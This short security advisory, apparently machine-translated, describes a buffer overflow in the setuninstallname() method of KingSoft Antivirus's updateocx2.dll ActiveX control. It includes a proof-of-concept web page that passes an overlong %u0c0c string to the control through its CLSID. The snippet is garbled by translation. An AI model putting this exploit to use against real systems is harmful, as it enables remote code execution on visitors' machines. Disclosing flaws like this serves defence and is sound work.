KingSoft Antivirus online update module is an online anti-virus update module.
The ActiveX control in the online upgrade module of KingSoft Antivirus improperly processes user-submitted parameter data. Remote attackers can exploit this vulnerability to execute arbitrary commands with application process permissions.
The problem exists in the processing of the setuninstallname () method by the C:/Windows/system32/Kingsoft/KOS/updateocx2.dll control. A super-long string is constructed as the parameter data of the setuninstallname () method, it also induces users to access malicious web pages, which can trigger buffer overflow and may execute arbitrary commands with application process permissions.
| Test method: [Warning] The following procedures (methods) may be offensive and are only for security research and teaching. You are at your own risk! Bytes ----------------------------------------------------------------------------------- <Object classid = 'clsid: D82303B7-A754-4DCB-8AFC-8CF99435AACE 'Id = 'target1'> </Object> <Object classid = 'clsid: D82303B7-A754-4DCB-8AFC-8CF99435AACE 'Id = 'target2'> </Object> <SCRIPT> VaR str1 = ""; While (str1.length <914) {Str1 + = Unescape ("% u0c0c "); } Target1.setuninstallname (str1 ); </SCRIPT> Bytes ----------------------------------------------------------------------------------- |
Suggestion: Currently, no solutions are available: Http://en.kingsoft.com/ |